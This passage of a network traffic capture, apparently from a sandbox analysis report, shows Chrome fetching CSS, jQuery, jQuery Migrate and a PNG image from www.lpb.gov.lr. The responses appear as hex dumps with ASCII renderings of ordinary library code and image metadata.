                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 2e 74 69 6d 65 6c 69 6e 65 5f 69 74 65 6d 73 20 3e 20 6c 69 3a 6e 74 68 2d 63 68 69 6c 64 28 65 76 65 6e 29 20 2e 64 65 73 63 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 6c 65 66 74 7d 0a 09 2e 74 69 6d 65 6c 69 6e 65 5f 69 74 65 6d 73 20 3e 20 6c 69 20 2e 64 65 73 63 3a 62 65 66 6f 72 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 0a 09 2e 74 69 6d 65 6c 69 6e 65 5f 69 74 65 6d 73 3a 61 66 74 65 72 7b 6c 65 66 74 3a 39 33 70 78 7d 0a 0a 09 2f 2a 20 54 72 61 69 6c 65 72 20 62 6f 78 20 2a 2f 0a 09 2e 74 72 61 69 6c 65 72 5f 62 6f 78 2e 68 6f 72 69 7a 6f 6e 74 61 6c 20 2e 64 65 73 63 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 34 30 70 78 7d 0a 09 2e 74 72 61 69 6c 65 72 5f 62 6f 78 2e 68 6f 72 69 7a 6f 6e 74 61 6c 3a 68 6f 76 65 72 20 2e 64 65 73 63 20 68 32 7b
                                                                                                                        Data Ascii: .timeline_items > li:nth-child(even) .desc{text-align:left}.timeline_items > li .desc:before{display:none}.timeline_items:after{left:93px}/* Trailer box */.trailer_box.horizontal .desc{padding-bottom:40px}.trailer_box.horizontal:hover .desc h2{
                                                                                                                        2025-01-10 13:54:46 UTC1058INData Raw: 77 72 61 70 70 65 72 20 2e 70 68 6f 74 6f 5f 77 72 61 70 70 65 72 2c 2e 66 65 61 74 75 72 65 5f 62 6f 78 20 2e 66 65 61 74 75 72 65 5f 62 6f 78 5f 77 72 61 70 70 65 72 20 2e 64 65 73 63 5f 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 77 69 64 74 68 3a 31 30 30 25 3b 70 61 64 64 69 6e 67 3a 30 7d 0a 09 2e 66 65 61 74 75 72 65 5f 62 6f 78 20 2e 66 65 61 74 75 72 65 5f 62 6f 78 5f 77 72 61 70 70 65 72 20 2e 70 68 6f 74 6f 5f 77 72 61 70 70 65 72 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0a 09 2e 66 65 61 74 75 72 65 5f 62 6f 78 20 2e 66 65 61 74 75 72 65 5f 62 6f 78 5f 77 72 61 70 70 65 72 20 2e 70 68 6f 74 6f 5f 77 72 61 70 70 65 72 20 61 7b 64 69 73 70 6c 61 79 3a
                                                                                                                        Data Ascii: wrapper .photo_wrapper,.feature_box .feature_box_wrapper .desc_wrapper{display:block;width:100%;padding:0}.feature_box .feature_box_wrapper .photo_wrapper{margin-bottom:15px;text-align:center}.feature_box .feature_box_wrapper .photo_wrapper a{display:


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        13192.168.2.74977269.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:45 UTC558OUTGET /wp-includes/js/jquery/jquery.min.js?ver=3.7.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:46 UTC370INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 28 Aug 2023 17:14:23 GMT
                                                                                                                        ETag: "15601-603fed35e19c0"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 87553
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:45 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:46 UTC7822INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 37 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                        Data Ascii: /*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 64 73 65 74 22 29 3b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 28 74 29 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 66 69 6e 61 6c 6c 79 7b 74 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 74 29 2c 74 3d 6e 75 6c 6c 7d 7d 66 75 6e 63 74 69 6f 6e 20 42 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 66 65 28 65 2c 22 69 6e 70 75 74 22 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 5f 28 74 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 28 66 65 28 65 2c 22 69 6e 70 75 74 22 29 7c 7c 66 65 28 65 2c 22 62 75 74 74 6f 6e 22 29 29 26 26 65 2e 74 79 70 65 3d 3d 3d 74 7d 7d 66 75 6e 63
                                                                                                                        Data Ascii: dset");try{return!!e(t)}catch(e){return!1}finally{t.parentNode&&t.parentNode.removeChild(t),t=null}}function B(t){return function(e){return fe(e,"input")&&e.type===t}}function _(t){return function(e){return(fe(e,"input")||fe(e,"button"))&&e.type===t}}func
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 74 69 6f 6e 22 29 26 26 21 21 65 2e 73 65 6c 65 63 74 65 64 7d 2c 73 65 6c 65 63 74 65 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 70 61 72 65 6e 74 4e 6f 64 65 26 26 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 21 30 3d 3d 3d 65 2e 73 65 6c 65 63 74 65 64 7d 2c 65 6d 70 74 79 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 65 2e 6e 6f 64 65 54 79 70 65 3c 36 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 21 62 2e 70 73 65 75 64 6f 73 2e 65 6d 70 74 79 28 65 29 7d 2c 68 65 61 64 65 72 3a 66 75 6e 63
                                                                                                                        Data Ascii: tion")&&!!e.selected},selected:function(e){return e.parentNode&&e.parentNode.selectedIndex,!0===e.selected},empty:function(e){for(e=e.firstChild;e;e=e.nextSibling)if(e.nodeType<6)return!1;return!0},parent:function(e){return!b.pseudos.empty(e)},header:func
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 74 68 69 73 2e 67 65 74 28 29 2c 63 65 28 65 2c 74 29 29 29 29 7d 2c 61 64 64 42 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 61 64 64 28 6e 75 6c 6c 3d 3d 65 3f 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 3a 74 68 69 73 2e 70 72 65 76 4f 62 6a 65 63 74 2e 66 69 6c 74 65 72 28 65 29 29 7d 7d 29 2c 63 65 2e 65 61 63 68 28 7b 70 61 72 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 74 26 26 31 31 21 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 3f 74 3a 6e 75 6c 6c 7d 2c 70 61 72 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 64 28 65 2c 22 70 61 72 65 6e 74 4e 6f 64 65 22 29 7d 2c 70 61 72 65 6e 74 73 55 6e 74 69 6c 3a 66 75
                                                                                                                        Data Ascii: this.get(),ce(e,t))))},addBack:function(e){return this.add(null==e?this.prevObject:this.prevObject.filter(e))}}),ce.each({parent:function(e){var t=e.parentNode;return t&&11!==t.nodeType?t:null},parents:function(e){return d(e,"parentNode")},parentsUntil:fu
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 20 30 21 3d 3d 28 74 3d 7a 2e 67 65 74 28 6f 2c 6e 29 29 3f 74 3a 76 6f 69 64 20 30 21 3d 3d 28 74 3d 56 28 6f 2c 6e 29 29 3f 74 3a 76 6f 69 64 20 30 3b 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7a 2e 73 65 74 28 74 68 69 73 2c 6e 2c 65 29 7d 29 7d 2c 6e 75 6c 6c 2c 65 2c 31 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 6e 75 6c 6c 2c 21 30 29 7d 2c 72 65 6d 6f 76 65 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7a 2e 72 65 6d 6f 76 65 28 74 68 69 73 2c 65 29 7d 29 7d 7d 29 2c 63 65 2e 65 78 74 65 6e 64 28 7b 71 75 65 75 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3b 69 66 28 65 29 72 65 74 75 72 6e 20 74 3d 28 74
                                                                                                                        Data Ascii: 0!==(t=z.get(o,n))?t:void 0!==(t=V(o,n))?t:void 0;this.each(function(){z.set(this,n,e)})},null,e,1<arguments.length,null,!0)},removeData:function(e){return this.each(function(){z.remove(this,e)})}}),ce.extend({queue:function(e,t,n){var r;if(e)return t=(t
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 29 2c 74 3d 30 3b 77 68 69 6c 65 28 28 69 3d 61 5b 74 2b 2b 5d 29 26 26 21 75 2e 69 73 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 29 7b 75 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3d 69 2e 65 6c 65 6d 2c 6e 3d 30 3b 77 68 69 6c 65 28 28 6f 3d 69 2e 68 61 6e 64 6c 65 72 73 5b 6e 2b 2b 5d 29 26 26 21 75 2e 69 73 49 6d 6d 65 64 69 61 74 65 50 72 6f 70 61 67 61 74 69 6f 6e 53 74 6f 70 70 65 64 28 29 29 75 2e 72 6e 61 6d 65 73 70 61 63 65 26 26 21 31 21 3d 3d 6f 2e 6e 61 6d 65 73 70 61 63 65 26 26 21 75 2e 72 6e 61 6d 65 73 70 61 63 65 2e 74 65 73 74 28 6f 2e 6e 61 6d 65 73 70 61 63 65 29 7c 7c 28 75 2e 68 61 6e 64 6c 65 4f 62 6a 3d 6f 2c 75 2e 64 61 74 61 3d 6f 2e 64 61 74 61 2c 76 6f 69 64 20 30 21 3d 3d 28 72 3d 28 28 63 65 2e 65 76 65 6e
                                                                                                                        Data Ascii: ),t=0;while((i=a[t++])&&!u.isPropagationStopped()){u.currentTarget=i.elem,n=0;while((o=i.handlers[n++])&&!u.isImmediatePropagationStopped())u.rnamespace&&!1!==o.namespace&&!u.rnamespace.test(o.namespace)||(u.handleObj=o,u.data=o.data,void 0!==(r=((ce.even
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 70 65 6e 64 43 68 69 6c 64 28 65 29 7d 29 7d 2c 70 72 65 70 65 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 31 31 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 74 68 69 73 2e 6e 6f 64 65 54 79 70 65 29 7b 76 61 72 20 74 3d 52 65 28 74 68 69 73 2c 65 29 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 74 2e 66 69 72 73 74 43 68 69 6c 64 29 7d 7d 29 7d 2c 62 65 66 6f 72 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 24 65 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 74 68 69 73 2e 70 61 72 65 6e 74 4e 6f 64 65
                                                                                                                        Data Ascii: pendChild(e)})},prepend:function(){return $e(this,arguments,function(e){if(1===this.nodeType||11===this.nodeType||9===this.nodeType){var t=Re(this,e);t.insertBefore(e,t.firstChild)}})},before:function(){return $e(this,arguments,function(e){this.parentNode
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 69 73 2e 73 74 61 72 74 3d 74 68 69 73 2e 6e 6f 77 3d 74 68 69 73 2e 63 75 72 28 29 2c 74 68 69 73 2e 65 6e 64 3d 72 2c 74 68 69 73 2e 75 6e 69 74 3d 6f 7c 7c 28 63 65 2e 63 73 73 4e 75 6d 62 65 72 5b 6e 5d 3f 22 22 3a 22 70 78 22 29 7d 2c 63 75 72 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 61 74 2e 70 72 6f 70 48 6f 6f 6b 73 5b 74 68 69 73 2e 70 72 6f 70 5d 3b 72 65 74 75 72 6e 20 65 26 26 65 2e 67 65 74 3f 65 2e 67 65 74 28 74 68 69 73 29 3a 61 74 2e 70 72 6f 70 48 6f 6f 6b 73 2e 5f 64 65 66 61 75 6c 74 2e 67 65 74 28 74 68 69 73 29 7d 2c 72 75 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 61 74 2e 70 72 6f 70 48 6f 6f 6b 73 5b 74 68 69 73 2e 70 72 6f 70 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 6f 70 74 69 6f 6e 73 2e 64
                                                                                                                        Data Ascii: is.start=this.now=this.cur(),this.end=r,this.unit=o||(ce.cssNumber[n]?"":"px")},cur:function(){var e=at.propHooks[this.prop];return e&&e.get?e.get(this):at.propHooks._default.get(this)},run:function(e){var t,n=at.propHooks[this.prop];return this.options.d
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 63 65 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 63 65 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 63 65 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 63 65 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 6d 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 63 65 2e 72 65 6d 6f 76 65 41 74 74 72 28 65 2c 74 29 3a 69 26 26 22 73 65 74 22 69 6e 20 69 26 26 76 6f 69 64 20 30 21 3d 3d 28 72 3d 69 2e 73 65 74 28 65 2c 6e 2c 74 29 29 3f 72 3a 28 65 2e 73 65 74 41 74
                                                                                                                        Data Ascii: &2!==o)return"undefined"==typeof e.getAttribute?ce.prop(e,t,n):(1===o&&ce.isXMLDoc(e)||(i=ce.attrHooks[t.toLowerCase()]||(ce.expr.match.bool.test(t)?mt:void 0)),void 0!==n?null===n?void ce.removeAttr(e,t):i&&"set"in i&&void 0!==(r=i.set(e,n,t))?r:(e.setAt
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 69 73 61 62 6c 65 64 22 29 26 26 4f 74 2e 74 65 73 74 28 74 68 69 73 2e 6e 6f 64 65 4e 61 6d 65 29 26 26 21 48 74 2e 74 65 73 74 28 65 29 26 26 28 74 68 69 73 2e 63 68 65 63 6b 65 64 7c 7c 21 77 65 2e 74 65 73 74 28 65 29 29 7d 29 2e 6d 61 70 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 63 65 28 74 68 69 73 29 2e 76 61 6c 28 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 6e 75 6c 6c 3a 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 6e 29 3f 63 65 2e 6d 61 70 28 6e 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 65 2e 72 65 70 6c 61 63 65 28 4c 74 2c 22 5c 72 5c 6e 22 29 7d 7d 29 3a 7b 6e 61 6d 65 3a 74 2e 6e 61 6d 65 2c 76 61 6c 75 65 3a 6e 2e 72 65 70 6c 61 63 65 28 4c 74
                                                                                                                        Data Ascii: isabled")&&Ot.test(this.nodeName)&&!Ht.test(e)&&(this.checked||!we.test(e))}).map(function(e,t){var n=ce(this).val();return null==n?null:Array.isArray(n)?ce.map(n,function(e){return{name:t.name,value:e.replace(Lt,"\r\n")}}):{name:t.name,value:n.replace(Lt


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        14192.168.2.74977369.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:45 UTC566OUTGET /wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1 HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: */*
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:46 UTC369INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Fri, 09 Jun 2023 05:49:24 GMT
                                                                                                                        ETag: "3509-5fdabee5f2100"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 13577
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:45 GMT
                                                                                                                        Vary: Accept-Encoding,User-Agent
                                                                                                                        Content-Type: text/javascript
                                                                                                                        2025-01-10 13:54:46 UTC7823INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 4d 69 67 72 61 74 65 20 76 33 2e 34 2e 31 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 26 26 28 6a 51 75 65 72 79 2e 6d 69 67 72 61 74 65 4d 75 74 65 3d 21 30 29 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 5b 22 6a 71 75 65 72 79 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72
                                                                                                                        Data Ascii: /*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */"undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){r
                                                                                                                        2025-01-10 13:54:46 UTC5754INData Raw: 6c 69 63 65 28 31 29 29 7c 7c 41 5b 72 5d 7c 7c 75 28 22 63 73 73 2d 6e 75 6d 62 65 72 22 2c 27 4e 75 6d 62 65 72 2d 74 79 70 65 64 20 76 61 6c 75 65 73 20 61 72 65 20 64 65 70 72 65 63 61 74 65 64 20 66 6f 72 20 6a 51 75 65 72 79 2e 66 6e 2e 63 73 73 28 20 22 27 2b 65 2b 27 22 2c 20 76 61 6c 75 65 20 29 27 29 29 2c 51 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 29 7d 2c 22 63 73 73 2d 6e 75 6d 62 65 72 22 29 3b 76 61 72 20 53 2c 50 2c 6b 2c 48 2c 45 3d 73 2e 64 61 74 61 3b 69 28 73 2c 22 64 61 74 61 22 2c 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 2c 6f 2c 61 3b 69 66 28 74 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 32 3d 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 29 7b 66 6f 72
                                                                                                                        Data Ascii: lice(1))||A[r]||u("css-number",'Number-typed values are deprecated for jQuery.fn.css( "'+e+'", value )')),Q.apply(this,arguments))},"css-number");var S,P,k,H,E=s.data;i(s,"data",function(e,t,r){var n,o,a;if(t&&"object"==typeof t&&2===arguments.length){for


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                        15192.168.2.74977469.163.179.334432924C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                        2025-01-10 13:54:45 UTC619OUTGET /wp-content/uploads/2024/02/home-page-image.png HTTP/1.1
                                                                                                                        Host: www.lpb.gov.lr
                                                                                                                        Connection: keep-alive
                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                        Sec-Fetch-Dest: image
                                                                                                                        Referer: https://www.lpb.gov.lr/
                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                        2025-01-10 13:54:46 UTC367INHTTP/1.1 200 OK
                                                                                                                        Date: Fri, 10 Jan 2025 13:54:45 GMT
                                                                                                                        Server: Apache
                                                                                                                        Upgrade: h2
                                                                                                                        Connection: Upgrade, close
                                                                                                                        Last-Modified: Mon, 05 Feb 2024 10:22:21 GMT
                                                                                                                        ETag: "275ba9-6109fd64e3a6a"
                                                                                                                        Accept-Ranges: bytes
                                                                                                                        Content-Length: 2579369
                                                                                                                        Cache-Control: max-age=2592000
                                                                                                                        Expires: Sun, 09 Feb 2025 13:54:45 GMT
                                                                                                                        Vary: User-Agent,Accept-Encoding
                                                                                                                        Content-Type: image/png
                                                                                                                        2025-01-10 13:54:46 UTC7825INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 00 00 00 04 80 08 02 00 00 00 b6 a3 11 cd 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 0b 50 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 36 2e 30 2d 63 30 30 32 20 37 39 2e 31 36 34 34 36 30 2c 20 32 30 32 30 2f 30 35 2f 31 32 2d 31 36 3a 30 34 3a 31 37 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44
                                                                                                                        Data Ascii: PNGIHDRpHYsPiTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c002 79.164460, 2020/05/12-16:04:17 "> <rdf:RD
                                                                                                                        2025-01-10 13:54:46 UTC8000INData Raw: 5d 03 00 20 44 d6 5a bd b8 88 f6 79 53 7b 9d 21 a2 19 5e 6e 83 e6 a2 7c 70 ac 79 c9 1a 5e c5 8d 1d 7b 7b 7d 7e 97 2f e8 f5 6d 5b f5 42 75 93 b8 5d 68 34 9e e7 51 7a 59 75 c1 f3 7c 00 80 2b b2 ee 7c 6d 5c 7a 20 97 77 d9 4d 43 ee bf 42 4a 17 f1 ed f6 ef 8a 74 81 85 43 10 84 d0 79 ec 12 8c 11 84 c6 68 b3 a8 37 ef d2 02 42 08 95 92 ce 1f c7 b5 7f 19 25 ed 76 a8 17 ab 1c 2e de cc 7d 0a 21 c4 18 c9 85 00 e4 ce 1a 40 58 96 95 d6 da 0f 82 a2 28 5c 30 35 00 60 32 19 3f 7e fc 78 73 73 f3 af ff fa af e2 d0 2f 8a 32 cf 73 17 9c 6e ad 15 42 00 00 96 75 2a 1a 1a 5e 87 db 1e 61 1a 5e 8a 1b 05 5e f5 6f cd 9d 37 17 f4 e7 c7 5d be a6 8d 07 50 c3 07 8c 5d d4 8e 5d d4 d1 20 9c b3 45 7c 16 76 1a 07 e7 7c 3e 9f 97 65 e9 79 5e b7 d3 01 00 8c c7 63 00 40 b7 db f5 7d 5f 4a 81 09
